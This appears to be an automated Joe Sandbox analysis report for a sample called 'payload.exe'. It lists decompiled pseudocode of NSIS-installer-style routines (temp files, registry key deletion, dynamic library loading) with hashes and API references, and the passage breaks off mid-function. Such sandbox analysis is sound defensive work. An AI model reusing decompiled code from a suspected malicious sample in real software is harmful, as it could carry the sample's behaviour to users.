Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsg90FC.tmp
API String ID: 1356686001-2787541972
Opcode ID: 2aeca9d40c2f44e41a3d2ec26537502cd5dfdc14477a75349ca227dcf68636c1
Instruction ID: 26fcae0a7b2a502e926faea7c6e927eea7b3aae3134fdb689c9e3a18d41500d2
Opcode Fuzzy Hash: 2aeca9d40c2f44e41a3d2ec26537502cd5dfdc14477a75349ca227dcf68636c1
Instruction Fuzzy Hash: 3E1145B1E00108BFEB10AFA5EE89EAF767DEB54358F10403AF505B71D1D6B85D419B28

Uniqueness

Uniqueness Score: -1.00%

Function 00405859 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405859(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CF9(0x421110, _a4);
				_t21 = E00405804(0x421110);
				if(_t21 != 0) {
					E00405F64(_t21);
					if(( *0x423718 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421110;
						while(1) {
							_t11 = lstrlenA(0x421110);
							_push(0x421110);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FFD();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004057B2(0x421110);
								continue;
							} else {
								goto L1;
							}
						}
						E0040576B();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405865
0x00405870
0x00405874
0x0040587b
0x00405887
0x00405893
0x00405893
0x004058ab
0x004058ac
0x004058b3
0x004058b4
0x00000000
0x00000000
0x00405897
0x0040589e
0x004058a6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040589e
0x004058b6
0x004058bc
0x00000000
0x004058ca
0x00405889
0x0040588d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040588d
0x00405876
0x00000000

APIs

Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06

Part of subcall function 00405804: CharNextA.USER32(?), ref: 00405812
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,T'Wu,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058AC
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,T'Wu,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,75572754,C:\Users\user\AppData\Local\Temp\), ref: 004058BC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405859
T'Wu, xrefs: 0040585B
C:\Users\user\AppData\Local\Temp\nsg90FC.tmp, xrefs: 0040585F, 00405864, 0040586A, 004058A5, 004058AB, 004058B3, 004058BB

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsg90FC.tmp$T'Wu
API String ID: 3248276644-91782430
Opcode ID: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
Instruction ID: 1d2993da53655c0900dfa7f8eb6ffa86a16769ab8224128061af08a25d69d353
Opcode Fuzzy Hash: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
Instruction Fuzzy Hash: 16F0F427105E5165DA22323B1C05B9F1A44CD86354718C53BFC51F22D2DA3CC8629DBE

Uniqueness

Uniqueness Score: -1.00%

Function 0040599B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040599B(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x4093ac; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x0040599f
0x004059a5
0x004059a6
0x004059a6
0x004059ab
0x004059ac
0x004059af
0x004059b9
0x004059c6
0x004059c9
0x004059d1
0x00000000
0x00000000
0x004059d5
0x00000000
0x00000000
0x004059d7
0x00000000
0x004059d7
0x00000000

APIs

GetTickCount.KERNEL32(75572754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\payload.exe",004030D7,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 004059AF
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059C9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
nsa, xrefs: 004059A6
"C:\Users\user\Desktop\payload.exe", xrefs: 0040599B

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\payload.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1361509281
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: 3a3981258a6ccd3f3c7180c2fb01dffc681fdc90015df490a153c8b64b3610b8
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: 6DF08276708214ABEB108F55EC04B9B7B9CDF91760F10C03BFA48DA190D6B599548B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402A7A(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x4237b0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A7A(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406092(3);
					if(_t27 == 0) {
						if( *0x4237b0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x4237b0, 0);
				}
				return _t18;
			}

0x00402a9b
0x00402aa3
0x00402acb
0x00402ab5
0x00402b05
0x00402b0b
0x00000000
0x00402b0d
0x00402ac9
0x00000000
0x00000000
0x00402ac9
0x00402ae0
0x00402ae8
0x00402aef
0x00402b1b
0x00000000
0x00000000
0x00402b23
0x00402b2b
0x00000000
0x00000000
0x00000000
0x00402b2b
0x00000000
0x00402afe
0x00402b12

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ae09a9da48d779165f4d820b178e7b78ee37b087aa05fe1e09047ef6d5127422
Instruction ID: feb6aed171ad8b85e204e5b4e2feb4536d295dbd67c3687bd8867431d3a466b7
Opcode Fuzzy Hash: ae09a9da48d779165f4d820b178e7b78ee37b087aa05fe1e09047ef6d5127422
Instruction Fuzzy Hash: 53117F71A00108FFDF229F90DE89EAE3B7DEB54349B104076FA01B10A0D7749E51DB69

Uniqueness

Uniqueness Score: -1.00%

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
				_push(1); // executed
				_t34 = E10001A5D(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100021B0(_t50);
					}
					E100021FA(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100023DA(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001559(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100023DA(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100023DA(_t50);
							_t34 = GlobalFree(E10001266(E10001559(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E100023A0(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014E2( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002AA3(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100027E8(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002589(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x100016bd
0x100016bd
0x100016bd
0x100016c7
0x100016cf
0x100016dc
0x100016ea
0x100016ed
0x100016ef
0x100016f4
0x100016f9
0x1000180c
0x1000180c
0x100016ff
0x10001703
0x10001706
0x1000170b
0x1000170d
0x10001713
0x10001719
0x10001749
0x10001750
0x10001774
0x100017b3
0x10001776
0x10001776
0x10001777
0x1000177a
0x10001780
0x10001784
0x10001787
0x1000178c
0x1000178c
0x10001793
0x10001799
0x1000179f
0x100017ab
0x100017ac
0x100017af
0x10001752
0x10001753
0x10001768
0x10001768
0x100017bd
0x100017c0
0x100017cd
0x100017d4
0x100017dc
0x100017df
0x100017df
0x100017dc
0x100017ec
0x100017f4
0x100017f9
0x100017ec
0x10001801
0x00000000
0x10001803
0x00000000
0x10001804
0x10001801
0x1000171d
0x10001720
0x1000173e
0x00000000
0x00000000
0x10001741
0x10001746
0x10001746
0x10001748
0x00000000
0x10001748
0x10001722
0x10001723
0x1000172b
0x1000172c
0x00000000
0x1000172c
0x10001725
0x10001726
0x10001734
0x00000000
0x10001734
0x10001729
0x00000000
0x00000000
0x00000000
0x10001729

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2

Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,10004010,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A1D(3);
				 *(_t55 + 8) = E00402A1D(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A3A(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A3A(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A3A();
					_t28 = E00402A3A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
					goto L10;
				} else {
					_t52 = E00402A1D();
					_t37 = E00402A1D();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C57();
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bd3
0x00401bdf
0x00401be2
0x00401beb
0x00401beb
0x00401bee
0x00401bf2
0x00401bfb
0x00401bfb
0x00401bfe
0x00401c02
0x00401c04
0x00401c51
0x00401c53
0x00401c5c
0x00401c64
0x00401c67
0x00401c67
0x00401c70
0x00000000
0x00401c06
0x00401c0d
0x00401c0f
0x00401c17
0x00401c1a
0x00401c42
0x00401c76
0x00401c76
0x00401c1c
0x00401c2a
0x00401c32
0x00401c35
0x00401c35
0x00401c1a
0x00401c79
0x00401c7c
0x00401c82
0x00402877
0x00402877
0x004028d2
0x004028de

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32 ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 42ac717b5df7d2cec433c0636a0426ea096ef7e280fb5d2d86a20e037e064bd8
Instruction ID: 8c5f373ebb4f04a7667d2ac223661d72b1d1710abc4319b228b7a024b5145321
Opcode Fuzzy Hash: 42ac717b5df7d2cec433c0636a0426ea096ef7e280fb5d2d86a20e037e064bd8
Instruction Fuzzy Hash: 50216271A44108BFEF129FB0C94AAAD7B75DB44308F14807EF541B61D1D6B886419B29

Uniqueness

Uniqueness Score: -1.00%

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401F90(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4237b8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423788 =  *0x423788 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A3A(0xfffffff0);
				 *(_t34 + 8) = E00402A3A(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F12(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x424000, 0x40a7ec, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403619(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f90
0x00401f90
0x00401f95
0x00401f9c
0x00402057
0x004021c4
0x004021c4
0x004028cf
0x004028d2
0x004028de
0x004028de
0x00401fab
0x00401fb5
0x00401fb8
0x00401fc7
0x00401fcb
0x00401fd1
0x00401fd5
0x00402050
0x00000000
0x00402050
0x00401fd7
0x00401fe0
0x00401fe4
0x00402028
0x00401fe6
0x00401fe9
0x00401fec
0x0040201c
0x00401fee
0x00401ff1
0x00401ffa
0x00401ffc
0x00401ffc
0x00401ffa
0x00401fec
0x00402030
0x00402045
0x00402045
0x00000000
0x00402030
0x00401fbb
0x00401fc1
0x00401fc5
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 00404F12: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
Part of subcall function 00404F12: lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
Part of subcall function 00404F12: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FA6
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FC0
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FCE

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FDB
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402045

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 16b403b5e5009e1bd150d7402655e3879776899e8f583e554ec1c22846a11af5
Instruction ID: 033e4e5f5e4c037d50d2464c5542d6b5672e4837e9f8cb01fb8d89ff16108e1c
Opcode Fuzzy Hash: 16b403b5e5009e1bd150d7402655e3879776899e8f583e554ec1c22846a11af5
Instruction Fuzzy Hash: 1A212B72904211FBDF217FA48E49AAE76B1AB45318F30423BF701B62D0C7BD49459A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A3A(0xfffffff0);
				_t13 = E00405804(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405796(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
